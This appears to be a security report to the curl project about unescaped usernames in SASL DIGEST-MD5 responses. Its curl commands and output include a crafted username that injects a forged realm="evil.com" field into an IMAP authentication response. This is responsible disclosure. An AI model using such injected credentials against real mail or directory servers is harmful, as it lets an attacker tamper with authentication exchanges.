Unescaped username in SASL DIGEST-MD5 response allows injection

## Summary: The username is inserted into the digest-md5 response without escaping the quotes or backslashes. The HTTP digest path on line 863 in lib/vauth/digest.c uses auth_digest_string_quoted() but the SASL does not (line 478). Commit ac419bf sorted the HTTP in 2013. It looks like the SASL was moved into the same file much later on so was potentially missed. There is a comment that says escape the realm and nonce as necessary but it doesn't mention the user. ## Affected version 8.19.1 Tested on my mac but I expect it to work on all platforms. ## Steps To Reproduce: I created a dummy server (using Claude code full disclosure) to demo. curl -s --max-time 2 --digest --user 'admin:pass' http://127.0.0.1:8888/ Produces: Authorization: Digest username="admin", realm="test", nonce="abc123", uri="/", cnonce="OGE4MDE5ZDQ0NGUyMWQ4NTA3Y2JjNmViMTgzZDc4NWQ=", nc=00000001, qop=auth, response="741d2018ce65199de3d31d86c6b40a0e" curl -s --max-time 2 --digest --user 'admin"test:pass' http://127.0.0.1:8888/ Produces: Authorization: Digest username="admin\"test", realm="test", nonce="abc123", uri="/", cnonce="MmMwNGRmYzdkYjMxNDI0Mjg3NjUwODU3NWRjMTk4ZWU=", nc=00000001, qop=auth, response="cd9a77e93a813147fb6433d6adc94a10" curl -s --max-time 2 imap://127.0.0.1:1143/ --user "admin\"test:pass" --login-options "AUTH=DIGEST-MD5" Produces: username="admin"test",realm="test",nonce="abc123",cnonce="731e487fc8b26e964f61a99afb4bc6dd",nc="00000001",digest-uri="imap/127.0.0.1",response=5833517c49eae3087bb93c977f4ddbea,qop=auth And then using this exploit: curl -s --max-time 2 imap://127.0.0.1:1143/ --user "admin\",realm=\"evil.com:pass" --login-options "AUTH=DIGEST-MD5" Produces: username="admin",realm="evil.com",realm="test",nonce="abc123",cnonce="94bd2728bd0e169a68954fecf1778a07",nc="00000001",digest-uri="imap/127.0.0.1",response=796d4900b43a41a294abe87a20a13da9,qop=auth I've added in the evil realm by injecting a field into the request. I've attached the full server script so you can see how I tested it. ## Impact ## Summary: A username containing " or \ produces a malformed digest-md5 response. This could potentially enable injection of data into the smtp/imap/pop3/ldap auth.